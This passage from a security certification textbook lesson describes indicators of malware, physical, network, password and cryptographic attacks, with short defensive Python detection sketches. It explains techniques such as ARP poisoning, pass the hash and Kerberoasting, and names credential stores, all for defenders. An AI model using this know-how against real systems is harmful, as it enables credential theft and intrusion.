incident response and digital forensics, including the data sources and event
management tools necessary for investigations, alerting, and monitoring.
• Develop an incident classification system and prepare IRPs and playbooks for
distinct incident scenarios.
• Host log file data sources (network, system, security, vulnerability scan
output).
• Consider the order of volatility and potential loss of evidence if a host is shut
down or powered off.
• Deploy forensic tools that can capture and validate evidence from persistent
and nonpersistent media.
• Log events and metadata from firewalls, applications, endpoint antivirus and
DLP, OS-specific security events, IDS/IPS, network appliances, SNMP, and
vulnerability scans.
• Consider deploying SIEM to aggregate and correlate data sources to drive event
alerting and monitoring dashboards and automated reports. Use alert tuning to
reduce false positives, without increasing false negatives.
LESSON INTRODUCTION
The preparation phase of incident response identifies data sources that can support
investigations. It also provisions tools to aggregate and correlate this data and
partially automate its analysis to drive an alerting and monitoring system. While
automated detection is a huge support for the security team, it cannot identify
all indicators of malicious activity. As an incident responder, you must be able to
identify signs in data sources that point to a particular type of attack.
Lesson Objectives
In this lesson, you will do the following:
• Analyze indicators of malicious activity in malware, physical, network, and
application attacks.
Topic 13A
Malware Attack Indicators
By classifying the various types of malware and identifying the signs of infection,
security teams are better prepared to remediate compromised systems or prevent
malware from executing in the first place.
Malware Classification
Many of the intrusion attempts perpetrated against computer networks depend on
the use of malicious software, or malware. Malware is simply defined as software
that does something bad, from the perspective of the system owner. A complicating
factor with malware classification is the degree to which its installation is expected
or tolerated by the user.
Some malware classifications, such as Trojan, virus, and worm, focus on the vector
used by the malware. The vector is the method by which the malware executes on a
computer and potentially spreads to other network hosts. The following categories
describe some types of malware according to vector:
• Viruses and worms represent some of the first types of malware and spread
without any authorization from the user by being concealed within the
executable code of another process. These processes are described as being
infected with malware.
• Trojan refers to malware concealed within an installer package for software that
appears to be legitimate. This type of malware does not seek any type of consent
for installation and is actively designed to operate secretly.
Other classifications are based on the payload delivered by the malware. The
payload is an action performed by the malware other than simply replicating or
persisting on a host. Examples of payload classifications include spyware, rootkit,
remote access Trojan (RAT), and ransomware.
Computer Viruses
A computer virus is a type of malware designed to replicate and spread from
computer to computer, usually by “infecting” executable applications or program
code. There are several different types of viruses, and they are generally classified
by the different types of file or media that they infect:
• Non-resident/file infector—the virus is contained within a host executable file
and runs with the host process. The virus will try to infect other process images
on persistent storage and perform other payload actions. It then passes control
back to the host program.
• Memory resident—when the host file is executed, the virus creates a new
process for itself in memory. The malicious process remains in memory, even if
the host process is terminated.
• Boot—the virus code is written to the disk boot sector or the partition table of a
fixed disk or USB media and executes as a memory-resident process when the
OS starts or the media is attached to the computer.
In addition, the term “multipartite” is used for viruses that use multiple vectors and
the term “polymorphic” is used for viruses that can dynamically change or obfuscate
their code to evade detection.
What these types of viruses have in common is that they must infect a host file or media.
An infected file can be distributed through any normal means—on a disk, on a network,
as an attachment to an email or social media post, or as a download from a website.
• Fileless malware may use “live off the land” techniques rather than compiled
executables to evade detection. This means that the malware code uses
legitimate system scripting tools, notably PowerShell and Windows Management
Instrumentation (WMI), to execute payload actions. If they can be executed with
sufficient permissions, these environments provide all the tools the attacker
needs to perform scanning, reconfigure settings, and exfiltrate data.
The terms “advanced persistent threat (APT)” and “advanced volatile threat
(AVT)” can be used to describe this general class of modern fileless/live off the land
malware. Another useful classification is low-observable characteristics (LOC) attack.
The exact classification is less important than the realization that adversaries can
use any variety of coding tricks to effect intrusions and that their tactics, techniques,
and procedures to evade detection are continually evolving.
• Supercookies and beacons—as browser software gives the user some control
over what cookies to accept, web marketing companies have come up with
alternative ways to implement tracking that are difficult to disable. A supercookie
is a means of storing tracking data in a non-regular way, such as saving it to
cache without declaring the data to be a cookie or encoding data into header
requests. A beacon is a single-pixel image embedded into a website. While
invisible to the user, the browser must request the pixel when loading the page,
giving the beacon host the opportunity to collect metadata, perform browser
fingerprinting, and potentially run tracking scripts.
Using the Metasploit Meterpreter remote access tool to dump keystrokes from the victim machine,
revealing the password used to access a web app.
Keyloggers are not only implemented as software. A malicious script can transmit key
presses to a third-party website. There are also hardware devices to capture key presses
to a modified USB adapter inserted between the keyboard and the port. Such devices
can store data locally or come with Wi-Fi connectivity to send data to a covert access
point. Other attacks include wireless sniffers to record key press data, overlay ATM pin
pads, and so on.
In this context, RAT can also stand for remote administration tool. A host that is under
malicious control is sometimes described as a zombie.
A compromised host can be installed with one or more bots. A bot is an automated
script or tool that performs some malicious activity. A group of bots that are all
under the control of the same malware instance can be manipulated as a botnet
by the herder program. A botnet can be used for many types of malicious purposes,
including triggering distributed denial of service (DDoS) attacks, launching spam
campaigns, or performing cryptomining.
Rootkits
In Windows, Trojan malware that depends on manual execution by the logged-on
user inherits the privileges of that user account. If the account has only standard
permissions, the malware will only be able to add, change, or delete files in the
user’s profile and to run only apps and commands that the user is permitted to run.
If the malware attempts to change system-wide files or settings, it requires local
administrator-level privileges. To obtain those through manual installation or
execution, the user must be confident enough in the Trojan package to confirm the
User Account Control (UAC) prompt or enter the credentials for an administrative
user.
If the malware gains local administrator-level privileges, there are still protections
in Windows to mitigate abuse of these permissions. Critical processes run with
a higher level of privilege called SYSTEM. Consequently, Trojans installed or
executed with local administrator privileges cannot conceal their presence entirely
and will show up as a running process or service. Often the process image name
is configured to resemble a genuine executable or library to avoid detection.
For example, a Trojan may use the filename “rund1132.exe” to masquerade as
“rundll32.exe.” To ensure persistence (running when the computer is restarted),
the Trojan may have to use a registry entry or create itself as a service, which can
usually be detected easily.
If the malware can be delivered as the payload for an exploit of a severe
vulnerability, it may be able to execute without requiring any authorization using
SYSTEM privileges. Alternatively, the malware may be able to use an exploit to
escalate privileges to SYSTEM level after installation. Malware running with this level
of privilege is referred to as a rootkit. The term derives from UNIX/Linux where
any process running as the root superuser account has unrestricted access to
everything from the root of the file system down.
In theory, there is nothing about the system that a rootkit could not change. In
practice, Windows uses other mechanisms to prevent misuse of kernel processes,
such as code signing. Consequently, what a rootkit can do depends largely on
adversary capability and level of effort. When dealing with a rootkit, you should
be aware that there is the possibility that it can compromise system files and
programming interfaces, so that local shell processes, such as Explorer, taskmgr, or
tasklist on Windows or ps or top on Linux, plus port scanning tools, such as netstat,
no longer reveal its presence (at least, if run from the infected machine). A rootkit
may also contain tools for cleaning system logs, further concealing its presence.
Software processes can run in one of several "rings." Ring 0 is the most privileged (it
provides direct access to hardware) and so should be reserved for kernel processes only.
Ring 3 is where user-mode processes run; drivers and I/O processes may run in Ring 1 or
Ring 2. This architecture can also be complicated by the use of virtualization.
There are also examples of rootkits that can reside in firmware (either the computer
firmware or the firmware of any sort of adapter card, hard drive, removable
drive, or peripheral device). These can survive any attempt to remove the rootkit
by formatting the drive and reinstalling the OS. For example, the US intelligence
agencies have developed DarkMatter and Quark Matter UEFI rootkits targeting the
firmware on Apple Macbook laptops.
Scareware refers to malware that displays alarming messages, often disguised to look
like genuine OS alert boxes. Scareware attempts to alarm the user by suggesting that
the computer is infected or has been hijacked.
Crypto-Ransomware
The crypto class of ransomware attempts to encrypt data files on any fixed,
removable, and network drives. If the attack is successful, the user will be unable to
access the files without obtaining the private encryption key, which is held by the
attacker. This sort of attack is extremely difficult to mitigate unless
the user has backups of the encrypted files. One example of crypto-ransomware
is CryptoLocker, a Trojan that searches for files to encrypt and then prompts the
victim to pay a sum of money before a certain countdown time, after which the
malware destroys the key that allows the decryption.
Cryptojacking Malware
Another type of crypto-malware hijacks the resources of the host to perform
cryptocurrency mining. This is referred to as crypto-mining, and malware that
performs crypto-mining maliciously is classed as cryptojacking. The total number
of coins within a cryptocurrency is limited by the difficulty of performing the
calculations necessary to mint a new digital coin. Consequently, new coins can
be very valuable, but it takes enormous computing resources to discover them.
Cryptojacking is often performed across botnets.
Logic Bombs
Some types of malware do not trigger automatically. Having infected a system,
they wait for a preconfigured time or date (time bomb) or a system or user event
(logic bomb). Logic bombs also need not be malware code. A typical example is a
disgruntled systems administrator who leaves a scripted trap that runs in the event
their account is deleted or disabled. Antivirus software is unlikely to detect this kind
of malicious script or program. This type of trap is also referred to as a mine.
As an example of TTP analysis, consider the scenario where a criminal gang seeks to
blackmail companies by infecting hosts with ransomware. This is the threat actor’s
goal. To achieve the goal, they deploy a campaign, comprising a number of tactics,
such as reconnaissance, resource development, initial access, and execution.
Within the initial access tactic, the gang might have developed a novel technique to
exploit a vulnerability in some network monitoring software used by a wide range
of companies. Analysis of procedures reveals exactly how the exploited software
is installed on company networks through an infected repository. This enables the
gang’s next tactic (execution of malware).
An indicator of compromise (IoC) is a residual sign that an asset or network has
been successfully attacked or is continuing to be attacked. Put another way, an IoC
is evidence of a TTP. In the scenario above, IoCs could include the presence of the
compromised network monitor process version, connections to the C&C network,
Strictly speaking, an IoC is evidence of an attack that was successful. The term "indicator
of attack (IoA)" is sometimes also used for evidence of an intrusion attempt in progress.
Sandbox Execution
If malicious activity is not detected by endpoint protection, analyze the suspect
code or host in a sandboxed environment. A sandbox is a system configured to
be completely isolated from the production network so that the malware cannot
“break out.” The sandbox will be designed to record file system and registry
changes plus network activity. Similarly, a sheep dip is an isolated host used to test
new software and removable media for malware indicators before it is authorized
on the production network.
Resource Consumption
Abnormal resource consumption can be detected using a performance monitor.
Indicators such as excessive and continuous CPU usage, memory leaks, disk read/
write activity, disk space usage, and network bandwidth consumption can be signs
of malware. Resource consumption could be a reason to investigate a system rather
than definitive proof of malicious activity. These symptoms can also be caused by
many other performance and system stability issues. Also, it is only poorly written
malware or malware that performs intensive operations that displays this behavior.
For example, it is the nature of botnet DDoS, cryptojacking, and crypto-ransomware
to hijack the computer’s resources.
Windows Performance Monitor recording CPU utilization on a client PC. Anomalous activity
is difficult to diagnose, but this graph shows load rarely dropping below 50%. Continual load
is not typical of a client system, and could be an indicator of cryptojacking malware.
(Screenshot used with permission from Microsoft.)
File System
Malicious code might not execute from a process image saved on a local disk, but
it is still likely to interact with the file system and registry, revealing its presence by
behavior. A computer’s file system stores a great deal of useful metadata about
when files were created, accessed, or modified. Analyzing this metadata and
checking for suspicious temporary files can help to establish a timeline of events for
an incident that has left traces on a host and its files.
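Reading these timestamps programmatically is straightforward with the standard library, as this sketch shows. Note that st_ctime reports metadata change time on Linux but creation time on Windows; the temporary file is just a stand-in for a suspect file.

```python
# Sketch: read a file's timestamps (MAC times) to help build an incident timeline.
import os
import tempfile
from datetime import datetime, timezone

def mac_times(path):
    st = os.stat(path)
    return {
        "modified": datetime.fromtimestamp(st.st_mtime, tz=timezone.utc),
        "accessed": datetime.fromtimestamp(st.st_atime, tz=timezone.utc),
        # st_ctime: metadata change on Linux, creation time on Windows
        "changed": datetime.fromtimestamp(st.st_ctime, tz=timezone.utc),
    }

with tempfile.NamedTemporaryFile(delete=False) as f:
    f.write(b"suspect content")
    path = f.name

for label, ts in mac_times(path).items():
    print(label, ts.isoformat())
os.remove(path)
```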
Attempts to access valuable data can be revealed by blocked content indicators.
Where files are simply protected by ACLs, if auditing is configured, an access denied
message will be logged if a user account attempts to read or modify a file it does
not have permission to access. Information might also be protected by a data loss
prevention (DLP) system, which will also log blocked content events.
Resource Inaccessibility
Resource inaccessibility means that a network, host, file, or database is not
available. This is typically an indicator of a denial of service (DoS) attack. Host and
network gateways might be unavailable due to excessive resource consumption.
A network attack will often create large numbers of connections. Data resources
might be subject to ransomware attack. Additionally, malware might disable
scanning and monitoring utilities to evade detection.
Account Compromise
A threat actor will often try to exploit an existing account to achieve objectives. The
following indicators can reveal suspicious account behavior:
• Account lockout—the system has prevented access to the account because
too many failed authentication attempts have been made. Lockout could also
mean that the user’s password no longer works because the threat actor has
changed it.
• Concurrent session usage—this indicates that the threat actor has obtained
the account credentials and is signed in on another workstation or over a remote
access connection.
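A sketch of how concurrent session usage might be flagged from sign-in records follows. The (user, host, start, end) record format is a hypothetical log schema, not the output of any real product.

```python
# Sketch: flag accounts with overlapping sessions on different hosts.

def concurrent_sessions(records):
    """Return usernames with time-overlapping sessions on different hosts."""
    flagged = set()
    for i, (user, host, start, end) in enumerate(records):
        for user2, host2, start2, end2 in records[i + 1:]:
            if user == user2 and host != host2 and start < end2 and start2 < end:
                flagged.add(user)
    return flagged

records = [
    ("alice", "WS01", 900, 1000),
    ("alice", "WS07", 930, 990),   # overlaps on a second workstation
    ("bob",   "WS02", 900, 950),
    ("bob",   "WS02", 960, 1000),  # same host, sequential: fine
]
print(concurrent_sessions(records))  # {'alice'}
```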
Logging
A threat actor will often try to cover their tracks by removing indicators from log
files:
• Missing logs—this could mean that the log file has been deleted. As this is easy
to detect, a more sophisticated threat actor will remove log entries. This might
be indicated by unusual gaps between log entry times. The most sophisticated
type of attack will spoof log entries to conceal the malicious activity.
• Out-of-cycle logging—a threat actor might also manipulate the system time or
change log entry timestamps as a means of hiding activity.
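Gap detection over log timestamps can be sketched as follows; the one-hour threshold is an illustrative assumption that would be tuned to the normal logging rate of the system.

```python
# Sketch: flag unusually long gaps between log entries, which could indicate
# that a threat actor has removed entries.
from datetime import datetime, timedelta

def find_gaps(timestamps, max_gap=timedelta(hours=1)):
    pairs = zip(timestamps, timestamps[1:])
    return [(a, b) for a, b in pairs if b - a > max_gap]

logs = [
    datetime(2024, 5, 1, 9, 0),
    datetime(2024, 5, 1, 9, 20),
    datetime(2024, 5, 1, 13, 5),   # nearly four hours with no entries
    datetime(2024, 5, 1, 13, 10),
]
for a, b in find_gaps(logs):
    print(f"gap from {a} to {b}")
```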
Review Activity:
Malware Attack Indicators
travel services firm. The CEO is confused because they had heard that
Trojans represent the biggest threat to computer security these days.
What explanation can you give?
3. You are writing a security awareness blog for company CEOs subscribed
to your threat platform. Why are backdoors and Trojans different ways
of classifying and identifying malware risks?
Topic 13B
Physical and Network Attack Indicators
Company sites and offices and their networks present a wide attack surface
for threat actors to target. Understanding how denial of service, on-path, and
credential-based attacks are perpetrated and being able to diagnose their
indicators from appropriate data sources will help you to prevent and remediate
intrusion events.
Physical Attacks
A physical attack is one directed against cabling infrastructure, hardware devices,
or the environment of the site facilities hosting the network.
Brute Force
A brute force physical attack can take several different forms, some examples of
which are the following:
• Smashing a hardware device to perform physical denial of service (DoS).
Environmental
An environmental attack could be an attempt to perform denial of service. For
example, a threat actor could try to destroy power lines, cut through network
cables, or disrupt cooling systems. Alternatively, environmental and building
maintenance systems are known vectors for threat actors to try to gain access to
company networks.
The risk from physical attacks means that premises must be monitored for signs of
physical damage or the addition of rogue devices.
RFID Cloning
Radio Frequency ID (RFID) is a means of encoding information into passive tags.
When a reader is within range of the tag, it produces an electromagnetic wave
that powers up the tag and allows the reader to collect information from it. This
technology can be used to implement contactless building access control systems.
Cloning attacks can generally only target “dumb” access cards that transfer static
tokens rather than perform cryptoprocessing. If use of the cards is logged,
compromise might be indicated by impossible travel and concurrent use access
patterns.
Near-field communication (NFC) is derived from RFID and is also often used for
contactless cards. It works only at very close range and allows two-way communications
between NFC peers.
Network Attacks
A network attack is a general category for a number of strategies and techniques
that threat actors use to either disrupt or gain access to systems via a network
vector. Network attack analysis is usually informed by considering the place each
attack type might have within an overall cyberattack lifecycle:
• Reconnaissance is where a threat actor uses scanning tools to learn about
the network. Host discovery identifies which IP addresses are in use. Service
discovery identifies which TCP or UDP ports are open on a given host.
Fingerprinting identifies the application types and versions of the software
operating each port, and potentially of the operating system running on the
host, and its device type. Rapid scanning generates a large amount of distinctive
network traffic that can be detected and reported as an intrusion event, but it
is very difficult to differentiate malicious scanning activity from non-malicious
scanning activity.
• Denial of service (DoS) in a network context refers to attacks that cause hosts
and services to become unavailable. This type of attack can be detected by
monitoring tools that report when a host or service is not responding, or is
suffering from abnormally high volumes of requests. A DoS attack might be
launched as an end in itself, or to facilitate the success of other types of attacks.
• Weaponization, delivery, and breach refer to techniques that allow a threat actor
to get access without having to authenticate. This typically involves various types
of malicious code being directed at a vulnerable application host or service over
the network, or sending code concealed in file attachments, and tricking a user
into running it.
Note that stages in the lifecycle are iterative. For example, a threat actor might perform
external reconnaissance and credential harvesting or breach to obtain an initial
foothold. They might then perform reconnaissance and credential harvesting from the
foothold to perform lateral movement and privilege escalation on internal hosts.
Reflected Attacks
Assembling and managing a botnet large enough to overwhelm a network that has
effective DDoS mitigation measures can be a costly endeavor. This has prompted
threat actors to devise DDoS techniques that increase the effectiveness of each
attack. In a distributed reflected DoS (DRDoS) attack, the threat actor spoofs
the victim’s IP address and attempts to open connections with multiple third-party
servers. Those servers direct their SYN/ACK responses to the victim host. This
rapidly consumes the victim’s available bandwidth.
An asymmetric threat is one where the threat actor is able to perpetrate effective attacks
despite having fewer resources than the victim.
Amplified Attacks
An amplification attack is a type of reflected attack that targets weaknesses in
specific application protocols to make the attack more effective at consuming
target bandwidth. Amplification attacks exploit protocols that allow the attacker to
manipulate the request in such a way that the target is forced to respond with a
large amount of data. Protocols commonly targeted include domain name system
(DNS), Network Time Protocol (NTP), and Connectionless Lightweight Directory
Access Protocol (CLDAP). Another example of a particularly effective attack exploits
the memcached database caching system used by web servers.
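The effectiveness of these attacks is often expressed as a bandwidth amplification factor, which can be illustrated with a small calculation. The byte counts below are made-up figures for illustration, not measurements of any particular protocol.

```python
# Sketch: bandwidth amplification factor = response size / request size.

def amplification_factor(request_bytes, response_bytes):
    return response_bytes / request_bytes

# e.g. a small spoofed query that elicits a much larger response:
print(round(amplification_factor(60, 3000), 1))  # 50.0
```

Because the request carries the victim's spoofed source address, the victim receives the full-size response for every small request the attacker sends.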
DDoS Indicators
DDoS attacks can be diagnosed by traffic spikes that have no legitimate explanation,
but they can usually only be mitigated by providing high availability services, such
as load balancing and cluster services. In some cases, a stateful firewall can detect
a DDoS attack and automatically block the source. However, for many of the
techniques used in DDoS attacks, the source addresses will be randomly spoofed or
launched by bots, making it difficult to stop the attack at the source.
Dropping traffic from blocklisted IP ranges using Security Onion IDS. (Screenshot used
with permission from Security Onion.)
On-Path Attacks
An on-path attack is where the threat actor gains a position between two hosts,
and transparently captures, monitors, and relays all communication between them.
Because the threat actor relays the intercepted communications, the hosts might
not be able to detect the presence of the threat actor. An on-path attack could also
be used to covertly modify the traffic. For example, an on-path host could present
a workstation with a spoofed website form to try to capture the user credential.
This attack was previously referred to as a man-in-the-middle (MitM) attack and
is also known as an adversary-in-the-middle (AitM) attack.
On-path attacks can be launched at any network layer. One infamous example
attacks the way layer 2 forwarding works on local segments. The Address
Resolution Protocol (ARP) identifies the MAC address of a host on the local
segment that owns an IPv4 address. An ARP poisoning attack uses a packet crafter,
such as Ettercap, to broadcast unsolicited ARP reply packets. Because ARP has no
security mechanism, the receiving devices trust this communication and update
their MAC:IP address cache table with the spoofed address.
Packet capture opened in Wireshark showing ARP poisoning. (Screenshot used with permission
from wireshark.org.)
This screenshot shows packets captured during a typical ARP poisoning attack:
• In frames 6–8, the attacking machine (with MAC address ending :4a) directs
gratuitous ARP replies at other hosts (:76 and :77), claiming to have the IP
addresses .2 and .102. This pattern of gratuitous ARP traffic is an indicator
of the attack.
• In frame 9, the .101/:77 host tries to send a packet to the .2 host, but it is
received by the attacking host (with the destination MAC :4a).
• In frame 10, the attacking host retransmits frame 9 to the actual .2 host.
Wireshark colors the frame black and red to highlight the retransmission.
• In frames 11 and 12, you can see the reply from .2, received by the attacking host
in frame 11 and retransmitted to the legitimate host in frame 12.
The usual target will be the subnet’s default gateway (the router that accesses other
networks). If the ARP poisoning attack is successful, all traffic destined for remote
networks will be received by the attacker, implementing an on-path attack.
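One practical indicator of this attack is a single MAC address claiming multiple IP addresses in ARP replies. The sketch below applies that check to simplified (IP, MAC) tuples standing in for parsed ARP packets; the addresses are illustrative.

```python
# Sketch: flag MAC addresses that claim more than one IP address in ARP replies,
# a common indicator of ARP poisoning.
from collections import defaultdict

def suspicious_macs(arp_replies):
    """Return MACs claiming more than one IP, with the IPs they claim."""
    claims = defaultdict(set)
    for ip, mac in arp_replies:
        claims[mac].add(ip)
    return {mac: ips for mac, ips in claims.items() if len(ips) > 1}

replies = [
    ("10.1.0.2",   "aa:aa:aa:aa:aa:4a"),  # attacker claims the gateway...
    ("10.1.0.102", "aa:aa:aa:aa:aa:4a"),  # ...and another host's address
    ("10.1.0.101", "aa:aa:aa:aa:aa:77"),
]
print(suspicious_macs(replies))
```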
DNS is also a popular choice for implementing command & control (C&C) of remote
access Trojans. It can be used as a means of covertly exfiltrating data from a private
network.
Wireless Attacks
Wireless networks present particular security challenges and are frequently the
vector for various types of attacks.
Surveying Wi-Fi networks using MetaGeek inSSIDer. The Struct-Guest network shown in
the first window is the legitimate one and has WPA2 security configured. The evil twin
has the same SSID, but a different BSSID (MAC address), and open authentication.
(MetaGeek, Inc. © Copyright 2005–2023.)
Password Attacks
When a user chooses a password, the plaintext value is converted to a
cryptographic hash. This means that, in theory, no one except the user (not even
the systems administrator) knows the password, because the plaintext should not
be recoverable from the hash. A password attack aims to exploit the weaknesses
inherent in password selection and management to recover the plaintext and use it
to compromise an account.
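A minimal sketch of salted, slow password hashing using the standard library's PBKDF2 follows; the iteration count is an illustrative value, and real systems would use a vetted authentication framework rather than hand-rolled storage.

```python
# Sketch: store a salted, slow hash of the password instead of the plaintext.
import hashlib
import hmac
import os

def hash_password(password, salt=None, iterations=200_000):
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return salt, digest

def verify(password, salt, stored_digest, iterations=200_000):
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return hmac.compare_digest(candidate, stored_digest)  # constant-time compare

salt, digest = hash_password("correct horse battery staple")
print(verify("correct horse battery staple", salt, digest))  # True
print(verify("123456", salt, digest))                        # False
```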
Online Attacks
An online password attack is where the threat actor interacts with the authentication
service directly—a web login form or VPN gateway, for instance. An online password
attack can show up in audit logs as repeatedly failed logins and then a successful
login, or as successful login attempts at unusual times or locations. Apart from
ensuring the use of strong passwords by users, online password attacks can be
mitigated by restricting the number or rate of login attempts, and by shunning login
attempts from known bad IP addresses.
Note that restricting logins can be turned into a vulnerability as it exposes the account
to denial of service attacks. The attacker keeps trying to authenticate, locking out valid
users.
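A failed-attempt counter with lockout can be sketched as follows; the five-attempt threshold and fifteen-minute lockout window are illustrative policy values.

```python
# Sketch: lock an account after repeated failed logins for a fixed window.
import time

class LoginThrottle:
    def __init__(self, max_failures=5, lockout_seconds=900):
        self.max_failures = max_failures
        self.lockout_seconds = lockout_seconds
        self.failures = {}  # username -> (failure count, last failure time)

    def record_failure(self, user, now=None):
        now = now if now is not None else time.time()
        count, _ = self.failures.get(user, (0, 0))
        self.failures[user] = (count + 1, now)

    def is_locked(self, user, now=None):
        now = now if now is not None else time.time()
        count, last = self.failures.get(user, (0, 0))
        return count >= self.max_failures and now - last < self.lockout_seconds

throttle = LoginThrottle()
for _ in range(5):
    throttle.record_failure("alice", now=100)
print(throttle.is_locked("alice", now=200))   # True (within lockout window)
print(throttle.is_locked("alice", now=2000))  # False (lockout has expired)
```

As the caution above notes, this same mechanism can be abused for denial of service by deliberately locking out valid accounts, which is why time-limited lockouts or rate limiting are often preferred to permanent lockout.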
Offline Attacks
An offline attack means that the attacker has managed to obtain a database of
password hashes, such as %SystemRoot%\System32\config\SAM,
%SystemRoot%\NTDS\NTDS.DIT (the Active Directory credential store) or
/etc/shadow. Once the password database has been obtained, the cracker
does not interact with the authentication system. The only indicator of this type of
attack (other than misuse of the account in the event of a successful attack) is a file
system audit log that records the malicious account accessing one of these files.
Threat actors can also read credentials from host memory, in which case the only
reliable indicator might be the presence of attack tools on a host.
If the attacker cannot obtain a database of passwords, a packet sniffer might
be used to obtain the client response to a server challenge in an authentication
protocol. Some protocols send the hash directly; others use the hash to derive
an encryption key. Weaknesses in protocols using derived keys can allow for the
extraction of the hash for cracking.
Password Spraying
Password spraying is a horizontal brute force online attack. This means that the
attacker chooses one or more common passwords (for example, password or
123456) and tries them in conjunction with multiple usernames.
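Spraying has a distinctive signature: failures spread across many usernames, rather than many failures against one account. The sketch below flags source addresses whose failures span an unusually large number of distinct usernames; the ten-user threshold is an illustrative assumption.

```python
# Sketch: detect password spraying by counting distinct usernames per source.
from collections import defaultdict

def spraying_sources(failed_logins, min_distinct_users=10):
    users_per_source = defaultdict(set)
    for source_ip, username in failed_logins:
        users_per_source[source_ip].add(username)
    return [ip for ip, users in users_per_source.items()
            if len(users) >= min_distinct_users]

events = [("198.51.100.7", f"user{n:03d}") for n in range(50)]    # spray
events += [("203.0.113.9", "alice"), ("203.0.113.9", "alice")]    # typo-prone user
print(spraying_sources(events))  # ['198.51.100.7']
```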
In terms of network attacks, credential replay attacks mostly target Windows
Active Directory networks. There are also credential replay attacks that target
web applications; we will discuss these in the next topic.
• Service tickets for applications where the user has started a session.
• NT hash of local and domain user and service accounts that are currently signed
in, whether interactively or remotely over the network. Early Windows business
networks used NT LAN Manager (NTLM) challenge and response authentication.
While the NTLM protocol is deprecated for most uses, the NT hash is still used
as the credential storage format. The NT hash is used where legacy NTLM
authentication is still allowed, and can be involved in signing Kerberos requests
and responses.
Critically for network security, if different users are signed in on the same host,
secrets for all these accounts could be cached by LSASS. If some of these accounts
are for more privileged users, such as domain administrators, a threat actor might
be able to use the secrets to escalate privileges.
LSASS purges hashes from memory within a few minutes of the user signing out.
The SAM database caches local and Microsoft account credentials, but not domain
credentials. Some editions of Windows implement a virtualization feature called
Credential Guard to protect these secrets from malicious processes, even if they have
SYSTEM permissions.
Credential replay attacks use various mechanisms to obtain and exploit these locally
stored secrets to start authenticated sessions on other hosts and applications on
the network. For example, if a threat actor can obtain an NT hash, they can use a
pass the hash (PtH) attack to start a session on another host if that host is running a
service such as file sharing or remote desktop that still allows NTLM authentication.
The pass the hash process. The Security Accounts Manager (SAM) is a Windows registry
database that stores local account credentials. (Images © 123RF.com.)
Cryptographic Attacks
Attacks that target authentication systems often depend on the system using weak
cryptography.
Downgrade Attacks
A downgrade attack makes a server or client use a lower specification protocol
with weaker ciphers and key lengths. For example, a combination of an on-path and
downgrade attack on HTTPS might try to force the client to use a weak version of
transport layer security (TLS) or even downgrade to the legacy secure sockets layer
(SSL) protocol. This makes it easier for a threat actor to force the use of weak cipher
suites and forge the signature of a certificate authority that the client trusts.
A type of downgrade attack is used to attack Active Directory. A Kerberoasting
attack attempts to discover the passwords that protect service accounts by
obtaining service tickets and subjecting them to brute force password cracking
attacks. If the credential portion of the service ticket is encrypted using AES, it is
very hard to brute force. If the attack is able to cause the server to return the ticket
using weak RC4 encryption, a cracker is more likely to be able to extract the service
password.
Evidence of downgrade attacks is likely to be found in server logs or by intrusion
detection systems.
Collision Attacks
A collision is where a weak cryptographic hashing function or implementation
allows the generation of the same digest value for two different plaintexts. A
collision attack exploits this vulnerability to forge a digital signature. The attack
works as follows:
1. The attacker creates a malicious document and a benign document that
produce the same hash value. The attacker submits the benign document
for signing by the target.
2. The attacker then removes the signature from the benign document and adds
it to the malicious document, forging the target’s signature.
Birthday Attacks
A collision attack depends on being able to create a malicious document that
outputs the same hash as the benign document. Some collision attacks depend
on being able to manipulate the way the hash is generated. A birthday attack is
a means of exploiting collisions in hash functions through brute force. Brute force
means attempting every possible combination until a successful one is achieved.
The attack is named after the birthday paradox. This paradox shows that the
computational time required to brute force a collision might be less than expected.
The birthday paradox asks how large a group of people must be so that the chance
of two of them sharing a birthday is 50%. The answer is 23, but people who are
not aware of the paradox often answer around 183 (roughly 365/2). The point is that
the chances of someone sharing a particular birthday are small, but the chances
of any two people in a group sharing any birth date in a calendar year get
better and better as you add more people: 1 − (365 × (365 − 1) × (365 − 2) × ...
× (365 − (N − 1))) / 365^N.
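The formula can be computed directly; with 23 people, the probability of a shared birthday just passes 50%.

```python
# Compute the birthday paradox probability: 1 minus the probability that all
# N birthdays are distinct.

def shared_birthday_probability(n, days=365):
    p_all_distinct = 1.0
    for i in range(n):
        p_all_distinct *= (days - i) / days
    return 1 - p_all_distinct

print(round(shared_birthday_probability(23), 4))  # ~0.5073
```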
To exploit the paradox, the attacker creates multiple malicious and benign
documents, both featuring minor changes (punctuation, extra spaces, and so on).
Depending on the length of the hash and the limits to the non-suspicious changes
that can be introduced, if the attacker can generate sufficient variations, then the
chance of matching hash outputs can be better than 50%. This effectively means
that a hash function that outputs 128-bit hashes can be attacked by a mechanism
that can generate 2^64 variations. Computing 2^64 variations will take much less
time than computing 2^128 variations.
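The brute force search can be demonstrated against a deliberately weakened hash. This sketch truncates SHA-256 to 16 bits purely for demonstration, so a collision appears after roughly 2^8 = 256 tries; a real 128-bit hash would need on the order of 2^64 attempts.

```python
# Sketch: birthday-style brute force collision search on a truncated hash.
import hashlib

def truncated_hash(data, bits=16):
    return hashlib.sha256(data).digest()[: bits // 8]

def find_collision(bits=16):
    seen = {}
    i = 0
    while True:
        msg = str(i).encode()
        h = truncated_hash(msg, bits)
        if h in seen:
            return seen[h], msg  # two different messages, same truncated hash
        seen[h] = msg
        i += 1

a, b = find_collision()
print(a != b, truncated_hash(a) == truncated_hash(b))  # True True
```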
Attacks that exploit collisions are difficult to launch, but the principle behind the
attack informs the need to use authentication methods that use both strong ciphers
and strong protocol and software implementations.
• Credential dumping—the malware might try to access the credentials file (SAM
on a local Windows workstation) or sniff credentials held in memory by the
lsass.exe system process. Additionally, a DCSync attack attempts to trick a
domain controller into replicating its user list, along with the account
credentials, to a rogue host.
Review Activity:
Network Attack Indicators
Topic 13C
Application Attack Indicators
A web application exposes many interfaces to public networks. Attackers can exploit
vulnerabilities in server software and in client browser security to perform injection
and session hijacking attacks that compromise data confidentiality and integrity.
Understanding how these attacks are perpetrated and being able to diagnose their
indicators from appropriate data sources will help you to prevent and remediate
intrusion events.
Application Attacks
An application attack targets a vulnerability in OS or application software. An
application vulnerability is a design flaw that can cause the application security
system to be circumvented or that will cause the application to crash. There are
broadly two main scenarios for application attacks:
• Compromising the operating system or third-party apps on a network host by
exploiting Trojans, malicious attachments, or browser vulnerabilities. This allows
the threat actor to obtain a foothold on a local network.
Privilege Escalation
The purpose of most application attacks is to allow the threat actor to run their own
